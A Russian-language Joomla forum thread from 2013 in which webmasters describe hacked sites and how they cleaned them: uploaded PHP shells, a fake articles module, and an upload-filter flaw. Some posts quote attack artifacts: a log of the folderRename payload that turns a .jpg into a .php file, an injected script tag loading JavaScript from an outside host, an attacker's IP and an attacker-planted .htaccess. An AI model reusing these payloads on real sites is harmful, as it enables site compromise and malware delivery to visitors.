Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 244127 Просмотров
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Ну её мое уже и до моего VDS добрался...
Сегодня зашел на аккаунт Gmail - в папке Spam обнаружил 3500 писем с домена, к которому привязан ящик.
Формат писем:

Спойлер
[свернуть]
Файл 7c334.php содержал что то наподобие:
Спойлер
[свернуть]
Прибил гада.

Компроментирован  ли теперь пользователь  VDS? В заголовках проскакивает что то про FreeBSD - я должен что то сообщить хостеру?
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
А что хостер, отпишет про проблемы со скриптами сайта.
Ищи шелл в файлах сайта. Владельцы файлов сайта разные на VDS ?
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Про пользователя - может да, а может и нет. Логи доступа могут подсказать. Скорее всего взломан именно сайт. Вы про root или пользователя аккаунта?
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Про пользователя - может да, а может и нет. Логи доступа могут подсказать. Скорее всего взломан именно сайт. Вы про root или пользователя аккаунта?
Я про пользователя аккаунта. Сам понимаю что "ступил" повесив одного пользователя на все домены, ща придется переделывать...
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Тут только лог доступа подскажет что-то. Да, на одного не надо было.
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Опять мне повезло, в ходе дальнейшего расследования проводимого моими силами и силами хостера (за что ему отдельное спасибо), на VDS был обнаружен модуль маскирующийся под модуль статей /modules/mod_articles1/
В составе:
mod_articles1.xml
Спойлер
[свернуть]
7c334.php
Спойлер
[свернуть]
mod_articles1.php
Спойлер
[свернуть]
« Последнее редактирование: 31.07.2013, 09:28:40 от flyingspook »
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Вот ведь засранцы - такой баг прозевали, а я думаю какого лешего кто то загружает на мои сайты всягое Г
(Перевод: Недостаточная фильтрация приводит к возможности обхода ограничений на загрузку файлов.)
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

sokol-iz-ussr

  • Захожу иногда
  • 90
  • 0 / 0
Вот ведь засранцы - такой баг прозевали, а я думаю какого лешего кто то загружает на мои сайты всягое Г
(Перевод: Недостаточная фильтрация приводит к возможности обхода ограничений на загрузку файлов.)

что это? в Joomla - Joomla! 2.5.8 есть такой баг?
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Версии: 2.5.13 и более ранние версий 2.5.x. 3.1.4 и более ранние версий 3.x.
*

mj23

  • Осваиваюсь на форуме
  • 28
  • 2 / 0
Я на хостинге поставил крон-задание (присылать отчет 1р в сутки) чтобы сканировал public_html на предмет появления новых файлов .php , .html, .gif

Сегодня ночью закачали 2 шелла
/home/****/public_html/site1/components/com_acepolls/xmikm3.php
/home/****/public_html/site2/libraries/cms/version/umps75.php

вроде все пообновлял, месяц была тишина, а тут опять дырку нашли :(
как я понял нашли дырку в компоненте голосовалка acepolls и в библиотеке, если голосовалку можно удалить, то что вот делать с библиотекой :( походу это глобальная уязвимость в Joomla.

п.с. Joomla 2.5.13 + adminexile + jHackGuard + marcosinterceptor11j16
причем jHackGuard и marcosinterceptor11j16 вообще не прислали никакого отчета о проникновении
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Надо бы обновить сначала Joomla до 2.5.14 , а то вроде там что-то нашли. А шелл могли при желании куда угодно залить. Сколько сайтов на аккаунте?
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
эти черти уже в открытую продают, во черти-то
щас учащиеся общеобразовательных учреждении накупят и третья волна попрет... или какая там уже...

Спойлер
[свернуть]
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
эти черти уже в открытую продают, во черти-то
щас учащиеся общеобразовательных учреждении накупят и третья волна попрет... или какая там уже...


опасно тем что их машины станут ботами, а они бараны ни чего не сломают, хотя этот брут на плохих каналах работать только как ddos будет, хостеров жалко да и сайтам достанется, будут в дауне вместе с серверами

сами то не брутят с ПК-шек, просто ботсеть решили нарастить еще и заработать, маркетинг, красаВЧеки
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Сегодня просматривая страницы в индексе яндекса нашел у себя:
В /libraries/mosets/profilepicture/file
Аккуратненько так пачечька страничек сложена - заархивировал, прикладываю к посту, может кому интересно покопаться будет.
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
закачали 2 шелла
/home/****/public_html/site1/components/com_acepolls/xmikm3.php
/home/****/public_html/site2/libraries/cms/version/umps75.php

как я понял нашли дырку в компоненте голосовалка acepolls и в библиотеке
Вывод о локализации уязвимости в конкретных скриптах сделан по анализу логов взлома?
Или по тому, в какую директорию хоста засунули шелл? Второй вариант действий ошибочен.
*

mj23

  • Осваиваюсь на форуме
  • 28
  • 2 / 0
WebDisaster, логов нету. подумал куда залили, там и дырка.
прогнал сайты файликом fls.php, шеллов не нашел, только такие
File: /home/***/public_html/site2/libraries/cms/version/version_sys.php
String:: $_POST[
File: /home/***/public_html/site2/administrator/templates/hathor/html/com_menus/menus/default.php
String:: confirm(

wishlight, 3 сайта. обновился до 2.5.14


Еще вот нашел старые логи jhackguard

Спойлер
[свернуть]
что это значит? в каких папках что где менялось/делалось?
« Последнее редактирование: 16.08.2013, 14:02:55 от mj23 »
*

mj23

  • Осваиваюсь на форуме
  • 28
  • 2 / 0
опять таже картина
/home/***/public_html/site1/components/com_acepolls/2nzm91.php
/home/***/public_html/site2/libraries/cms/version/b3ybhf.php
в те же папки.
за день до появления файлов jhackguard-log
#Fields: datetime   priority   category   message
2013-08-22T18:16:17+00:00   CRITICAL   jhackguard   Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"./im6713n5g.jpg\",\"./wthm5643g.php\"]} to:{"fn":"folderRename","args":["./im6713n5g.jpg","./wthm5643g.php"]}
2013-08-22T18:16:19+00:00   CRITICAL   jhackguard   Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"./im6713n5g.jpg\",\"./wthm9288g.php\"]} to:{"fn":"folderRename","args":["./im6713n5g.jpg","./wthm9288g.php"]}

п.с. Joomla 2.5.14 +adminexile + jHackGuard + marcosinterceptor11j16

буду пробовать ставить акиба админ тулс про
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Лучше поставьте то, что будет отслеживать модификацию и добавление файлов, а потом смотрите по логу сервера, как это делается. И главное - никакого вареза. JHacker Watch или Eyesite. По возможности обновить все расширения. Желательно просканировать сайты ai-bolit.
*

mj23

  • Осваиваюсь на форуме
  • 28
  • 2 / 0
wishlight, спасибо! ai-bolit'ом вычистил около 50  левых index.php, как раз в тех папках куда закачивают шеллы находились файлы version_sys.php и com_acepolls.php с одинаковым содержимым
по мимо этого в некоторые JPG был вставлен вредоносный код.
вообщем целый день потратил на чистку. будем надеяться поможет.
до ai-bolit содержимое проверял скриптом fls.php и он ничего подобного не обнаружил.
« Последнее редактирование: 27.08.2013, 13:45:15 от mj23 »
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
6.09 вечером 5 писем получил.атака на сайт, где нет cuhena
Спойлер
[свернуть]
IP забанил в nginx .
А на сайте клиента, где стоит cuhena , был только один запрос с этого же IP 94.228.220.68
-> POST /option=com_kunena
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Вот ведь скоты!
Во всех сайтах что на WP что на Joomla за 3 последних дня внедрение идет <script language="JavaScript" src="http://stummann.net/steffen/google-analytics/jquery-1.6.5.min.js" type="text/javascript"></script> прямо перед тегом <body>
Админки везде прикрыты, файлы 644, папки 755. КАК? Неуж то кто то учетку уже взломал по FTP. У меня скоро мания преследования начнется.
Пошел менять пароли где только можно... Грусть... Печаль... >:(
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
VPS ? с разными аккаунтами для всех сайтов?
А зачем ftp, а SSH ?
3 сайта все еще на одном акке
SSH - отключил еще 2 месяца назад на всех аккаунтах.
Вирус очень как то он хитро прописывает свой JS в блок head всех файлов index.php:
Код
<script language="JavaScript" src="http://stummann.net/steffen/google-analytics/jquery-1.6.5.min.js" type="text/javascript"></script>
Пишется походу регуляркой, так как скрипт четко всегда появляется перед </head>
Сегодня нашел папочки в корне сайтов - названия разные (cigarette и т.п.)
Папка  - права 777
В папке 2 файла:
.htaccess
Код
RewriteEngine On

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule index.php.* - [L]

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule ^(.*) index.php?id=$1



index.php

Спойлер
[свернуть]
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Да, походу прописывается везде где найдет </head>  :'( Блин.
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Для того, чтобы эти файлы грузились на сайт, где то оставлена "дыра". Ищите ее. До тех пор, пока не заделаете дыры, взломы продолжаться.
Мелкий ремонт. skype poisk-plus
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Для того, чтобы эти файлы грузились на сайт, где то оставлена "дыра". Ищите ее. До тех пор, пока не заделаете дыры, взломы продолжаться.
да, вы правы.
Хостер нашел сегодня дыры:
Спойлер
[свернуть]
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 347
Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 1167
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 1314
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 486
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 1090
Последний ответ 03.11.2020, 17:36:03
от Cedars